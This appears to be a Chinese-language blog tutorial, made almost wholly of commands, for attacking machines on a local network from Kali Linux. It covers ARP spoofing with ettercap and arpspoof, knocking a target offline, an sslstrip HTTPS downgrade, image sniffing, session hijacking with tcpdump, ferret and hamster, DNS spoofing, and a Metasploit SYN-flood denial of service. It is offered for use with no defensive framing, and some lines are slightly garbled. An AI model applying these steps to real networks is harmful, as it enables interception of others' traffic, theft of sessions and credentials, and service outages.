更改配置
Metasploit Kali Linux arp欺骗 ettercap session劫持 dns欺骗 arpspoof DOS***

基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS***_第1张图片

一、 更改配置
vi ./etc/Network-manager restart
#修改false为ture
service network-manager restart
vi ./etc/ettercap/etter.conf
ecuid/ecgid 全改成0
if you use iptables 后面内容去注释
*

二、arp欺骗、嗅探
(1)ettercap
echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote /目标IP/网关/ (也可以写作:// //)
#局域网内全ip、所有网关 i:网卡 Tq:文本模式
只有ettercap可以抓取文字,且ettercap集成了DNS欺骗插件

(2)arpspoof
echo 1 >>/proc/sys/net/ipv4/ip_forward
arpspoof -i 网卡 -t 网关 目标IP
#通说是: 目标 网关

#断网
arpspoof -i 网卡 -t 网关 目标IP

实现欺骗后,嗅探:

#(嗅探)将https链接还原为http
sslstrip -a -f -k

#查看图片
driftnet -i eth0

#session劫持
tcpdump -i eth0 -w qq.cap
ferret -t qq.cap (64位下需要安装)
hamster
http://hamster

三、DNS劫持
(1)使用ettercap进行arp欺骗
(2)修改etter.dns文件
echo 1 >>/proc/sys/net/ipv4/ip_forward
ettercap -i 网卡 -Tq -M arp:remote // //

vi /etc/ettercap/etter.dns

基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS***_第2张图片

(3)启用dns_spoof
在运行中的ettercap中输入p

基于Kali Linux实现ARP欺骗、嗅探、DNS欺骗、DOS***_第3张图片

输入 dns_spoof 激活插件

四、DOS***(潮汐***)
#进入Metasploit
msfconsole
#进入潮汐***目录
use auxiliary/dos/tcp/synflood 服务器地址
#show命令 显示需要填写(yes的必填)的内容
show options
#set命令 写内容
set rhost 目标服务器
#执行
exploit
另外(防呆不防傻):

目标ip查询: fping -asg 192.168.自己IP位置(一般只有一位).0/24
网卡、ip查询: ipconfig (win) ifconfig (linux)